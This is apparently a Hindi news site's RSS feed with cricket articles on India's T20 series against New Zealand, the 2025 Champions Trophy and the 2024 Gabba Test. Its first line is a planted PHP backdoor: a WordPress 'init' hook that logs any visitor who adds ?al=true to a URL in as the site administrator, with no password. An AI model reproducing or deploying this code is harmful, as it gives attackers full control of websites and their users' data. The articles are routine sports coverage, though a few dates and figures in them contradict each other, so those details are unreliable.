// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); india team – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 28 Jan 2026 06:36:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 वाइजैग T20: टीम इंडिया का धमाकेदार प्रदर्शन, ईशान चमके, सूर्या ने भी दिखाई शक्ति; श्रेयस IN, हार्दिक OUT https://pratyushaashakinayikiran.com/?p=194569 Wed, 28 Jan 2026 06:36:00 +0000 https://pratyushaashakinayikiran.com/?p=194569  विशाखापत्तनम
तो भारत और न्यूजीलैंड के बीच टी20 सीरीज का कारवां वाइजैग (व‍िशाखापत्तनम) पहुंच चुका है. जहां दोनों देशों के बीच सीरीज का चौथा मैच है. वैसे अच्छी बात यह है कि भारतीय टीम सीरीज में 3-0 से अजेय है. ऐसे में यह मैच एक तरह से बेंच पर बैठे ख‍िलाड़‍ियों के लिए मौका होगा. 

डॉ. वाईएस राजशेखर रेड्डी एसीए-वीडीसीए क्रिकेट स्टेडियम में देखा जाए तो कुल  4 टी20 मुकाबले हुए हैं. वहीं भारतीय टीम ने 3 मुकाबले जीते हैं, एक मुकाबले में उसे हार म‍िली है. 

इस मैदान पर सबसे पहले कोई टी20 मैच 14 फरवरी 2016 को हुआ था, जब भारतीय टीम ने श्रीलंका को 9 व‍िकेट से हराया था. इसके बाद दूसरा टी20 मैच 24 फरवरी 2019 को ऑस्ट्रेल‍िया के ख‍िलाफ भारत ने खेला, लेकिन  ऑस्ट्रेल‍िया ने 3 व‍िकेट से जीता.

इसके बाद 14 जून 2022 को भारत ने साउथ अफ्रीका को 48 रनों से मात दी. यहां कोई आख‍िरी टी20 मुकाबला भारत और ऑस्ट्रेल‍िया के बीच 2 नवंबर 2023 को हुआ. ज‍िसे भारतीय टीम ने रोमांचक अंदाज में 2 विकेट से अपने नाम किया. 
ईशान क‍िशन हैं वाइजैग में हाइएस्ट स्कोरर 
ईशान किशन ने यहां 2 टी20 मैच  खेले हैं और 112 रन बनाए हैं, इस तरह वो इस मदान पर हाइएस्ट स्कोरर हैं. ऑस्ट्रेल‍ियन बल्लेबाज जोश इंग्ल‍िश ने यहां एक मैच खेला और 110 रन बनाए. जो इस मैदान पर एकमात्र टी20 शतक है.

सूर्यकुमार यादव ने भी यहां एक मैच खेलते हुए 1 मैच में 80 रन जड़े हैं. वहीं इस मैदान पर रव‍िचंद्रन अश्व‍िन ने एक टी20 मैच खेला और  विकेट लिया. वहीं जसप्रीत बुमराह ने इस मैदान पर 2 टी20 मैच खेलते हुए 4 विकेट लिए हैं. युजवेंद्र चहल और हर्षल पटेल ने भी 4-4 विकेट झटके हैं. 

वाइजैग में ऐसी होगी प्लेइंग 11, बेंच पर बैठेंगे ये 4 ख‍िलाड़ी

भारत और न्यूजीलैंड के बीच 5 मैचों की टी20 सीरीज का चौथा मुकाबला आज (शुक्रवार) व‍िशाखापत्तनम (वाइजैग) के डॉ. वाईएस राजशेखर रेड्डी एसीए-वीडीसीए क्रिकेट स्टेडियम में है. भारत पहले से ही सीरीज में 3-0 की अजेय बढ़त पर है. ऐसे में यह देखना होगा कि भारतीय टीम इस मुकाबले में क्या बदलाव करती है, क्योंकि सीरीज में कुछ प्लेयर्स को कोई भी टी20 मैच खेलने का मौका नहीं मिला है. 

टी20 वर्ल्ड कप 2026 को देखते हुए भारतीय टीम हार्दिक पंड्या को आराम देने पर विचार कर सकती है. हार्दिक इंजरी-प्रोन माने जाते हैं और टीम मैनेजमेंट उन्हें बड़े टूर्नामेंट से पहले फ्रेश रखना चाहता है.श्रेयस अय्यर को शुरुआती तीन टी20 मुकाबलों के लिए तिलक वर्मा के रिप्लेसमेंट के तौर पर टीम में शामिल किया गया था.

हालांकि, अब उनके खेलने की संभावनाएं और मजबूत हो गई हैं. बीसीसीआई के सेंटर ऑफ एक्सीलेंस (CoE) की सलाह है कि तिलक वर्मा को पूरी तरह फिट होने से पहले जल्दबाजी में ना उतारा जाए. ऐसे में श्रेयस अय्यर को चौथे टी20 में हार्दिक पंड्या की जगह प्लेइंग XI में शामिल किया जा सकता है.टीम मैनेजमेंट न सिर्फ अय्यर की क्षमताओं को परखना चाहता है, बल्कि उन्हें टी20 फॉर्मैट में खुद को साबित करने का एक दुर्लभ मौका भी देना चाहता है.

ईशान किशन ने टी20 टीम में वापसी के बाद शानदार प्रदर्शन किया है. उन्होंने इस सीरीज़ में क्रमशः 8, 76 और 28 रन बनाए हैं. कप्तान सूर्यकुमार यादव और टीम मैनेजमेंट दोनों का उन्हें पूरा सपोर्ट हासिल है. ऐसे में इस बात की पूरी संभावना है कि उनको वाइजैग टी20 में मौका मिलेगा. ईशान को टी20 वर्ल्ड कप 2026 के लिए बैक-अप विकेटकीपर-बल्लेबाज के तौर पर देखा जा रहा है और मौजूदा फॉर्म को देखते हुए उन्हें आगे भी लगातार मौके मिलने तय माने जा रहे हैं.

वहीं अक्षर पटेल के भी प्लेइंग XI में लौटने की उम्मीद है, क्योंकि वह टी20 वर्ल्ड कप के लिहाज से टीम का अहम हिस्सा हैं. जसप्रीत बुमराह एक और मुकाबला खेल सकते हैं, जहां उनका साथ अर्शदीप सिंह और शिवम दुबे निभाएंगे.

स्पिन विभाग में कुलदीप यादव और रवि बिश्नोई टीम की पहली पसंद बने रह सकते हैं, जबकि वरुण चक्रवर्ती को एक बार फिर बेंच पर बैठना पड़ सकता है.

IND vs NZ 4th T20I के लिए संभावित भारतीय प्लेइंग XI: अभिषेक शर्मा – ओपनर, संजू सैमसन – ओपनर, ईशान किशन – बल्लेबाज, सूर्यकुमार यादव (कप्तान) – बल्लेबाज, श्रेयस अय्यर – बल्लेबाज, शिवम दुबे – ऑलराउंडर, अक्षर पटेल – ऑलराउंडर, रवि बिश्नोई – स्पिनर, कुलदीप यादव – स्पिनर, अर्शदीप सिंह – तेज गेंदबाज, जसप्रीत बुमराह – तेज गेंदबाज, 
बेंच पर: हार्दिक पंड्या, वरुण चक्रवर्ती, रिंकू सिंह, हर्षित राणा

वाइजैग में हुए टी20 मैचों की ह‍िस्ट्री

    23 नवंबर 2023: भारत ने ऑस्ट्रेलिया को 2 विकेट से हराया.
    14 जून 2022: भारत ने साउथ अफ्रीका को 48 रन से हराया.
    24 फरवरी 2019: ऑस्ट्रेलिया ने भारत को 3 विकेट से हराया.
    14 फरवरी 2016: भारत ने श्रीलंका को 9 विकेट से हराया.

भारत का टी20 सीरीज के ल‍िए स्क्वॉड: सूर्यकुमार यादव (कप्तान), अभिषेक शर्मा, संजू सैमसन (विकेटकीपर), ईशान किशन, श्रेयस अय्यर, हार्दिक पंड्या, शिवम दुबे, अक्षर पटेल, कुलदीप यादव, जसप्रीत बुमराह, वरुण चक्रवर्ती, रिंकू सिंह, अर्शदीप सिंह, रवि बिश्नोई, हर्षित राणा

न्यूजीलैंड का टी20 सीरीज के ल‍िए स्क्वॉड:मिचेल सेंटनर (कप्तान), डेवोन कॉन्वे, बेवन जैकब्स, डेरिल मिचेल, ग्लेन फिलिप्स, टिम रॉबिनसन, जिमी नीशम, ईश सोढ़ी, जैक फॉल्क्स, मार्क चैपमैन, माइकल ब्रेसवेल, रचिन रवींद्र, काइल जेम‍िसन, मैट हेनरी, जैकब डफी, क्रिस्टियन क्लार्क

भारत vs न्यूजीलैंड के बीच टी20 सीरीज 2026 मुकाबलों का र‍िजल्ट 
1st T20I, नागपुर: भारत ने न्यूज़ीलैंड को 48 रन से हराया
2nd T20I, रायपुर: भारत ने न्यूज़ीलैंड को 7 विकेट से हराया 

3rd T20I, गुवाहाटी: भारत ने न्यूज़ीलैंड को 8 विकेट से हराया 

 

]]>
चैम्पियंस ट्रॉफी में बांग्लादेश-PAK को हराते ही टीम इंडिया रचेगी इतिहास, अब तक कोई नहीं कर सका ऐसा https://pratyushaashakinayikiran.com/?p=131789 Sun, 16 Feb 2025 11:56:00 +0000 https://pratyushaashakinayikiran.com/?p=131789 दुबई

इंग्लैंड टीम को 3 मैचों की घरेलू वनडे सीरीज में 3-0 से क्लीन स्वीप करने के बाद भारतीय टीम अब अपने अगले मिशन की तैयारी में जुट गई है. रोहित शर्मा का कप्तानी वाली भारतीय टीम का अगला मिशन ICC चैम्पियंस ट्रॉफी 2025 है, जो पाकिस्तान की मेजबानी में होना है.

चैम्पियंस ट्रॉफी 2025 को अब सिर्फ 6 दिन ही बाकी हैं. टूर्नामेंट का आगाज 19 फरवरी को होगा, जबकि फाइनल मुकाबला 9 मार्च खेला जाएगा. भारतीय टीम अपने सभी मैच दुबई में खेलेगी. यह टूर्नामेंट 8 साल बाद लौट रहा है.

चैम्पियंस ट्रॉफी में ऐसा करने वाली पहली टीम बनेगी?

भारतीय टीम का पहला मैच 20 फरवरी को बांग्‍लादेश के खिलाफ दुबई में होगा. इसके बाद टीम इंडिया को अपना दूसरा मुकाबला 23 फरवरी को खेलना है. यह मैच पाकिस्तान के खिलाफ होगा. टीम इंडिया ग्रुप स्टेज में अपना तीसरा यानी आखिरी मैच 2 मार्च को न्यूजीलैंड के खिलाफ खेलेगी.

यदि रोहित ब्रिगेड अपने शुरुआती दोनों मुकाबले जीतती है, तो वो एक ऐतिहासिक रिकॉर्ड अपने नाम कर लेगी. दरअसल, चैम्पियंस ट्रॉफी में अब तक भारतीय टीम के ही नाम सबसे ज्यादा 18 मैच जीतने का रिकॉर्ड दर्ज है. उनके बाद दूसरा नंबर इंग्लैंड का है, जिसने 14 मैच जीते हैं.

भारतीय टीम अपने शुरुआती दोनों मैचों में बांग्लादेश और पाकिस्तान को हराती है, तो चैम्पियंस ट्रॉफी में वो अपनी 20वीं जीत दर्ज कर लेगी. जो अब तक कोई भी नहीं कर सका है. इस तरह टीम इंडिया चैम्पियंस ट्रॉफी में 20 मैच जीतने वाली पहली टीम बन जाएगी.

हालांकि भारतीय टीम को यह रिकॉर्ड बनाने के लिए टूर्नामेंट में सिर्फ 2 मैच जीतने हैं. ग्रुप स्टेज में उसे 3 मैच खेलने हैं. सेमीफाइनल के लिए इन तीन में से भारतीय टीम को 2 मैच हर हाल में जीतने होंगे. यदि ऐसा होता है तो रिकॉर्ड बनना तय है.

CT में सबसे ज्यादा मैच जीतने वाली टॉप-5 टीमें

टीम वनडे जीते हारे टाई बेनतीजा
भारत 29 18 8 0 3
इंग्लैंड 25 14 11 0 0
श्रीलंका 27 14 11 0 2
वेस्टइंडीज 24 13 10 1 0
ऑस्ट्रेलिया 24 12 8 0 4

चैम्प‍ियंस ट्रॉफी में होंगे कुल 15 मैच

चैम्पियंस ट्रॉफी 2025 में 8 टीमों के बीच कुल 15 मुकाबले होंगे. टीमों को 2 ग्रुप में बांटा गया है. भारत और पाकिस्तान एक ही ग्रुप-ए में हैं. उनके साथ बाकी दो टीमें न्यूजीलैंड और बांग्लादेश हैं. जबकि ग्रुप-बी में साउथ अफ्रीका, ऑस्ट्रेलिया, अफगानिस्तान और इंग्लैंड को रखा गया है. सभी 8 टीमें अपने-अपने ग्रुप में 3-3 मुकाबले खेलेंगी.

इसके बाद हर ग्रुप की टॉप-2 टीमें सेमीफाइनल के लिए क्वालिफाई करेंगी. पहला सेमीफाइनल दुबई, जबकि दूसरा लाहौर में होगा. इसके बाद फाइनल मुकाबला खेला जाएगा. ऐसे में यदि कोई टीम फाइनल तक पहुंचती है, तो वो टूर्नामेंट में कुल 5 मैच खेलेगी.

4 वेन्यू पर खेले जाएंगे सभी मुकाबले

चैम्पियंस ट्रॉफी के ये सभी 15 मुकाबले 4 वेन्यू पर खेले जाएंगे. इसमें 3 वेन्यू पाकिस्तान में होंगे. जबकि एक वेन्यू दुबई रहेगा. भारतीय टीम अपने सभी मुकाबले दुबई में ही खेलेगी. यदि भारतीय टीम क्वालिफाई करती है, तो फाइनल भी दुबई में होगा. वरना खिताबी मुकाबला 9 मार्च को लाहौर में खेला जाएगा.

सेमीफाइनल मैचों और फाइनल के लिए एक रिजर्व डे भी रखा गया है. पहला सेमीफाइनल दुबई में होगा. जबकि दूसरा सेमीफाइनल लाहौर में खेला जाएगा. एक सेमीफाइनल समेत 10 मुकाबले पाकिस्तान के 3 वेन्यू पर होंगे. यह तीनों वेन्यू लाहौर, कराची और रावलपिंडी हैं.

चैम्पियंस ट्रॉफी के ग्रुप

ग्रुप ए – पाकिस्तान, भारत, न्यूजीलैंड, बांग्लादेश
ग्रुप बी – दक्षिण अफ्रीका, ऑस्ट्रेलिया, अफगानिस्तान, इंग्लैंड.

चैम्पियंस ट्रॉफी का फुल शेड्यूल…

19 फरवरी- पाकिस्तान बनाम न्यूजीलैंड, कराची
20 फरवरी- बांग्लादेश बनाम भारत, दुबई
21 फरवरी- अफगानिस्तान बनाम साउथ अफ्रीका, कराची
22 फरवरी- ऑस्ट्रेलिया बनाम इंग्लैंड, लाहौर
23 फरवरी- पाकिस्तान बनाम भारत, दुबई
24 फरवरी- बांग्लादेश बनाम न्यूजीलैंड, रावलपिंडी
25 फरवरी- ऑस्ट्रेलिया बनाम साउथ अफ्रीका, रावलपिंडी
26 फरवरी- अफगानिस्तान बनाम इंग्लैंड, लाहौर
27 फरवरी- पाकिस्तान बनाम बांग्लादेश, रावलपिंडी
28 फरवरी- अफगानिस्तान बनाम ऑस्ट्रेलिया, लाहौर
1 मार्च- साउथ अफ्रीका बनाम इंग्लैंड, कराची
2 मार्च- न्यूजीलैंड बनाम भारत, दुबई
4 मार्च- सेमीफाइनल-1, दुबई
5 मार्च- सेमीफाइनल-2, लाहौर
9 मार्च- फाइनल, लाहौर (भारत के फाइनल में पहुंचने पर दुबई में खेला जाएगा)
10 मार्च- रिजर्व डे

]]>
टीम इंडिया की एडिलेड में हार के बाद इन खिलाड़ियों पर गिरेगी गाज… गाबा टेस्ट से होगी छुट्टी! https://pratyushaashakinayikiran.com/?p=107953 Mon, 09 Dec 2024 18:26:00 +0000 https://pratyushaashakinayikiran.com/?p=107953 ब्रिस्बेन

भारत और ऑस्ट्रेलिया के बीच पांच मैचों की टेस्ट सीरीज का दूसरा मुकाबला एडिलेड ओवल में खेला गया था. इस मुकाबले में भारतीय टीम को 10 विकेट से करारी हार झेलनी पड़ी. भारत ने ऑस्ट्रेलिया के सामने जीत के लिए सिर्फ 19 रनों का टारगेट सेट किया था, जिसे उसने बेहद आराम से हासिल कर लिया. अब दोनों टीमों के बीच सीरीज का तीसरा मुकाबला 14 दिसंबर (शनिवार) से ब्रिस्बेन के गाबा मैदान पर खेला जाएगा.

तीसरे टेस्ट के लिए प्लेइंग-11 में होंगे बदलाव!

देखा जाए तो एडिलेड टेस्ट में हार की सबसे बड़ी वजह भारतीय बल्लेबाजों का फ्लॉप शो रहा. दोनों पारियों को मिलाकर भारतीय टीम 355 रन ही बना सकी, ऐसे में मैच जीतना दूर की बात थी. भारतीय गेंदबाज भी इस मुकाबले में उतने असरदार नहीं दिखे. तेज गेंदबाज हर्षित राणा तो खासे महंगे साबित हुए. हर्षित ने 5.40 की इकोनॉमी रेट से 16 ओवरों में 86 रन लुटाए. रविचंद्रन अश्विन की फिरकी भी नहीं चली और उन्होंने 53 रन देकर एक विकेट लिया. अश्विन के खिलाफ ट्रेविस हेड ने आक्रामकर रवैया अपनाया और कुछ बड़े शॉट्स लगाए.

भारतीय टीम को अब यदि इस सीरीज में धमाकेदार कमबैक करना है तो उसे एडिलेड टेस्ट में की गई गलतियों को दोहराने से बचना होगा. चाहे बैटिंग हो या बालिंग या फील्डिंग, तीनों डिपार्टमेंट में भारत को बेहतरीन खेल दिखाना होगा. भारतीय टीम की अब अगली परीक्षा ब्रिस्बेन के गाबा मैदान पर होनी है. गाबा टेस्ट में भारतीय टीम की प्लेइंग-11 में कुछ बदलाव देखने को मिल सकते हैं. तेज गेंदबाज हर्षित राणा की तीसरे टेस्ट से छुट्टी हो सकती है.

उनकी जगह दाएं हाथ के तेज गेंदबाज आकाश दीप को मौका मिल सकता है. हालांकि तेज गेंदबाज प्रसिद्ध कृष्णा भी दावेदार हैं, लेकिन आकाश को तवज्जो दी जा सकती है. आकाश दीप ने अब तक भारत के लिए 5 टेस्ट मैचों में भाग लिया है, जहां उनके नाम पर 10 विकेट हैं. ऑफ-स्पिनर रविचंद्रन अश्विन का भी इस मुकाबले से पत्ता कट सकता है. उनकी जगह रवींद्र जडेजा को गाबा टेस्ट में मौका मिल सकता है. जडेजा के होने से टीम को लेफ्ट-राइट कॉम्बिनेशन का भी विकल्प मिलेगा और भारत की बल्लेबाजी में भी गहराई रहेगी.

ऑस्ट्रेलियाई टीम में भी बदलाव की संभावना

उधर ब्रिस्बेन टेस्ट के लिए ऑस्ट्रेलियाई टीम में तेज गेंदबाज जोश हेजलवुड की वापसी हो सकती है. हेजलवुड साइड स्ट्रेन के चलते एडिलेड टेस्ट में नहीं खेल पाए थे. हेजलवुड के आने की स्थिति में स्कॉट बोलैंड को प्लेइंग-11 से बाहर रहना पड़ सकता है. ऑस्ट्रेलिया ने तीसरे टेस्ट के लिए अब तक स्क्वॉड का ऐलान नहीं किया है.

ब्रिस्बेन टेस्ट में भारत की संभावित प्लेइंग-11: यशस्वी जायसवाल, केएल राहुल, शुभमन गिल, विराट कोहली, ऋषभ पंत (विकेटकीपर), रोहित शर्मा (कप्तान), नीतीश कुमार रेड्डी, रवींद्र जडेजा, आकाश दीप, जसप्रीत बुमराह, मोहम्मद सिराज.

ब्रिस्बेन टेस्ट के ल‍िए ऑस्ट्रेलिया की संभावित प्लेइंग-11: उस्मान ख्वाजा, नाथन मैकस्वीनी, मार्नस लाबुशेन, स्टीव स्मिथ, ट्रेविस हेड, मिचेल मार्श, एलेक्स कैरी (विकेटकीपर), पैट कमिंस (कप्तान), मिचेल स्टार्क, नाथन लायन, स्कॉट बोलैंड/जोश हेजलवुड

भारत Vs ऑस्ट्रेलिया टेस्ट सीरीज में h2h
कुल टेस्ट सीरीज: 28
भारत जीता: 11
ऑस्ट्रेलिया जीता: 12
ड्रॉ: 5

ऑस्ट्रेलिया में भारत का टेस्ट सीरीज रिकॉर्ड
कुल टेस्ट सीरीज: 13
भारत जीता: 2
ऑस्ट्रेलिया जीता: 8
ड्रॉ: 3

भारतीय टीम का ऑस्ट्रेलिया दौरा
22-25 नवंबर: पहला टेस्ट, पर्थ (भारत 295 रनों से जीता)
6-10 दिसंबर: दूसरा टेस्ट, एडिलेड
14-18 दिसंबर: तीसरा टेस्ट, ब्रिस्बेन
26-30 दिसंबर: चौथा टेस्ट, मेलबर्न
03-07 जनवरी: पांचवां टेस्ट, सिडनी

]]>